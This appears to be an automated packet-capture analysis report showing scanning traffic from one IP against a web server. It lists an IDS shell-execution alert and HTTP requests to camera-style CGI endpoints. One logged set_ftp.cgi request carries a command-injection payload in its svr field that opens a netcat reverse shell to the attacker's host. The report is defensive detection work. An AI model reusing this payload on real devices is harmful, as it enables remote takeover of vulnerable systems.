2464945.pcap

MD50fd1c7c2f2fb6a0e6b73e44ae97e9953
Submission Date2020-09-16 05:58:33
Tags(not set)
Alert 1
Showing 1-1 of 1 item.
#
TimestampSrc IpDest IpAlert SignatureP
1
2020-09-11T21:16:06.369749-070089.248.166.183172.18.5.23ET WEB_SERVER /bin/sh In URI Possible Shell Command Execution Attempt*
DNS 0
#
TimestampSrc IpDest IpDns TypeResource Record NameResource Record TypeResource Data
No results found.
TLS 0
#
TimestampSource IPDestination IPTLS VersionServer Name Indication
No results found.
TFTP 0
#TimestampSrc IpDest IpTftp PacketTftp FileTftp Mode
No results found.
HTTP 3
Showing 1-3 of 3 items.
#
TimestampSourceHostnamePortMethodURLStatus
1
2020-09-11T21:15:56.172483-070089.248.166.183(not set)80GETlogin.cgi302
2
2020-09-11T21:16:15.358955-070089.248.166.183(not set)80GET/ftptest.cgi?loginuse=&loginpas=302
3
2020-08-21T10:24:26.424681-070089.248.166.183(not set)80GET/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fsh%29(not set)
SMB 0
#
TimestampSrc IpDest IpSMB DialectCommandSessionTree
No results found.
SMTP 0
#
TimestampSourceDestinationEmail FromEmail ToSubject
No results found.
Flow 4
Showing 1-4 of 4 items.
#
TimestampFlow IdEvent TypeSourceSource PortDestinationDestination PortProtocolHost
1
2020-08-21T10:24:26.424681-0700656441920146952flow89.248.166.18346889172.18.5.2380TCPpcapanalyzer
2
2020-08-21T10:24:26.424681-07001651027496928506flow89.248.166.18336630172.18.5.2380TCPpcapanalyzer
3
2020-08-21T10:24:26.424681-0700553270364221219flow89.248.166.18360964172.18.5.2380TCPpcapanalyzer
4
2020-08-21T10:24:26.424681-0700421758465647838flow89.248.166.18332922172.18.5.2380TCPpcapanalyzer
File 0
#
TimestampSourceDestinationFile NameFile MagicFile Size
No results found.

Comments(not set)

Update Download PCAP Delete